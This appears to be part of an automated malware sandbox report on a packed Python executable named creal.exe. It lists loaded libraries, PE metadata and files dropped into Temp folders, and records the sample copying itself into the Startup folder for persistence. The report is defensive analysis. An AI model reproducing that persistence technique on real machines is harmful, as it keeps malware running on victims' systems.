            Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\curl.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\curl.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\curl.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\curl.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\curl.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\curl.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\curl.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\creal.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: creal.exe | Static PE information: Image base 0x140000000 > 0x60000000
            Source: creal.exe | Static file information: File size 17171619 > 1048576
            Source: creal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: creal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: creal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: creal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: creal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: creal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: creal.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: creal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: creal.exe, 00000002.00000002.1584456751.00007FF8E7BD3000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: creal.exe, 00000002.00000002.1579097857.00007FF8E712F000.00000002.00000001.01000000.00000019.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: creal.exe, 00000002.00000002.1582537332.00007FF8E7642000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: creal.exe, 00000002.00000002.1588731612.00007FF8F7A06000.00000002.00000001.01000000.00000014.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: creal.exe, 00000000.00000003.1371953608.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1590369480.00007FF8F8BC3000.00000002.00000001.01000000.00000005.sdmp, creal.exe, 0000001A.00000003.1541448676.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: creal.exe, 00000000.00000003.1371953608.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1590369480.00007FF8F8BC3000.00000002.00000001.01000000.00000005.sdmp, creal.exe, 0000001A.00000003.1541448676.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: creal.exe, 00000000.00000003.1372232763.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1541833635.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: creal.exe, 00000002.00000002.1589596642.00007FF8F8303000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: creal.exe, 00000002.00000002.1589772887.00007FF8F8751000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: creal.exe, 00000002.00000002.1580095250.00007FF8E7177000.00000002.00000001.01000000.00000016.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: creal.exe, 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: creal.exe, 00000002.00000002.1587898705.00007FF8E802C000.00000002.00000001.01000000.0000000A.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1587254717.00007FF8E7FA8000.00000002.00000001.01000000.00000013.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: creal.exe, 00000002.00000002.1574615880.00007FF8E6EF2000.00000002.00000001.01000000.0000002D.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: creal.exe, 00000002.00000002.1580428919.00007FF8E71B2000.00000002.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: creal.exe, 00000002.00000002.1589350978.00007FF8F7EC3000.00000002.00000001.01000000.0000000E.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: creal.exe, 00000002.00000002.1587898705.00007FF8E802C000.00000002.00000001.01000000.0000000A.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1589012234.00007FF8F7A9D000.00000002.00000001.01000000.00000009.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: creal.exe, 00000002.00000002.1590664825.00007FF8F8D84000.00000002.00000001.01000000.0000000B.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: creal.exe, 00000002.00000002.1587570318.00007FF8E7FF9000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: creal.exe, 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: creal.exe, 00000002.00000002.1590664825.00007FF8F8D84000.00000002.00000001.01000000.0000000B.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: creal.exe, 00000002.00000002.1555010440.00000185BB290000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: creal.exe, 00000000.00000003.1372232763.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1541833635.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\libssl-3.pdb source: creal.exe, 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: creal.exe, 00000002.00000002.1583452111.00007FF8E77AD000.00000002.00000001.01000000.00000010.sdmp
            Source: creal.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: creal.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: creal.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: creal.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: creal.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: VCRUNTIME140_1.dll.0.dr | Static PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
            Source: creal.exe | Static PE information: section name: _RDATA
            Source: VCRUNTIME140.dll.0.dr | Static PE information: section name: fothk
            Source: VCRUNTIME140.dll.0.dr | Static PE information: section name: _RDATA
            Source: libcrypto-3.dll.0.dr | Static PE information: section name: .00cfg
            Source: libssl-3.dll.0.dr | Static PE information: section name: .00cfg
            Source: python312.dll.0.dr | Static PE information: section name: PyRuntim
            Source: creal.exe.2.dr | Static PE information: section name: _RDATA
            Source: VCRUNTIME140.dll.26.dr | Static PE information: section name: fothk
            Source: VCRUNTIME140.dll.26.dr | Static PE information: section name: _RDATA
            Source: libcrypto-3.dll.26.dr | Static PE information: section name: .00cfg
            Source: libssl-3.dll.26.dr | Static PE information: section name: .00cfg
            Source: python312.dll.26.dr | Static PE information: section name: PyRuntim
            Source: C:\Users\user\Desktop\creal.exe | Code function: 0_2_00007FF67A64506C push rcx; iretd 0_2_00007FF67A64506D
            Source: C:\Users\user\Desktop\creal.exe | Code function: 2_2_00007FF8E68F161E push rdx; iretd 2_2_00007FF8E68F1621
            Source: C:\Users\user\Desktop\creal.exe | Code function: 2_2_00007FF8E71F4541 push rcx; ret 2_2_00007FF8E71F4542
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | Code function: 26_2_00007FF7C3D2506C push rcx; iretd 26_2_00007FF7C3D2506D
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | Code function: 28_2_00007FF8E59B161E push rdx; iretd 28_2_00007FF8E59B1621
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | Code function: 28_2_00007FF8F8491D7B push rcx; retf 28_2_00007FF8F8491D7C
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\VCRUNTIME140_1.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_pkcs1_decode.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Math\_modexp.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_chacha20.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_chacha20.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\charset_normalizer\md.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_Salsa20.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_ghash_portable.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_eksblowfish.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography\hazmat\bindings\_rust.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\_uuid.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\_asyncio.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\libssl-3.dll
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_BLAKE2s.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_poly1305.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ofb.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\_socket.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\charset_normalizer\md__mypyc.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ofb.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\_bz2.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\VCRUNTIME140_1.dll
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA384.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD5.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\bcrypt\_bcrypt.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_BLAKE2b.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA256.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cfb.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA512.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\pyexpat.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\unicodedata.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\_hashlib.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\libcrypto-3.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\VCRUNTIME140.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\charset_normalizer\md__mypyc.cp312-win_amd64.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ctr.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\_decimal.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\bcrypt\_bcrypt.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\_hashlib.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\_socket.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\python312.dll
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\_queue.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ocb.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Util\_strxor.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ed25519.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_des.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD5.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Math\_modexp.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_aes.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\_ssl.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\_asyncio.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\_ctypes.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ctr.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\libffi-8.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_Salsa20.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ec_ws.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\_wmi.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\sqlite3.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ed448.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\libcrypto-3.dll
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\_overlapped.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\_uuid.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\_multiprocessing.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_keccak.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_x25519.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA1.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\python3.dll
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_ARC4.pyd
            Source: C:\Users\user\Desktop\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI75242\win32\win32api.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD2.pyd
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\sqlite3.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Protocol\_scrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\libssl-3.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_x25519.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\libffi-8.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\pyexpat.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Util\_cpuid_c.pydJump to dropped file
